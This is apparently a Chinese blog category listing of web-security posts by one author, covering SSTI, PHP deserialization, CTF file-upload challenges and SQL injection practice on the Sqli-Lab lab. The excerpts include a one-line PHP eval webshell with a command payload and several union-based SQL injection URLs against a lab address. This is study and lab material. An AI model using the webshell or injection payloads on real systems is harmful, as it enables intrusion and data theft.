Web安全
Joker_York
这个作者很懒,什么都没留下…
展开
-
SSTI模板注入
参考链接:https://www.cnblogs.com/wangtanzhi/p/12238779.html原创 2020-11-17 15:51:40 · 225 阅读 · 0 评论 -
php反序列化漏洞
php的序列化序列化函数:serialize,反序列化函数:unserialize,例:<?phpclass Test{ public $a = 'ThisA'; protected $b = 'ThisB'; private $c = 'ThisC'; public function test1(){ return "this is test1" ; }}$test = new Test();var_dump(serializ原创 2020-10-29 16:28:25 · 623 阅读 · 1 评论 -
CTF技能梳理系列 ---- 文件上传
主要以CTFHub技能树里的文件上传题目为例无验证直接上传webshell。<?php @eval($_GET[cmd]); ?>payload:http://url/upload/raw_shell.php?cmd=system("cat ../flag_161493477.php"); 前端验证查看页面源码,可以看到前端的JS验证代码:<script>function checkfilesuffix(){ var file=document.原创 2020-09-02 16:00:57 · 1479 阅读 · 0 评论 -
SQL注入积累
登陆(用户名不存在)登陆验证通常有两种方式:直接对用户输入的账号名和密码进行查询------提示用户名或密码错误针对用户输入的账号名进行查询对应的密码,再和用户输入的密码做比较------用户名错误时会提示用户名不存在这里讨论第二种情况,验证代码逻辑可能如下:select password from xx where username=xx;if(password==pass)then login因此,可以使用如下联合查询方式将自定义字符注入password参数(令username为F原创 2020-08-26 15:10:55 · 180 阅读 · 0 评论 -
Sqli-Lab第一部分(Basic Challenges)练习记录(非讲解,个人记录用)
GET - Error based1. Single quotes-Stringhttp://192.168.205.128:8080/Less-1/?id=-1%27%20union%20select%201,2,database()%232. Intiger basedhttp://192.168.205.128:8080/Less-2/?id=-1%20union%20select%201,2,database()%233. Single quotes with twist-stri原创 2020-07-24 15:01:17 · 336 阅读 · 0 评论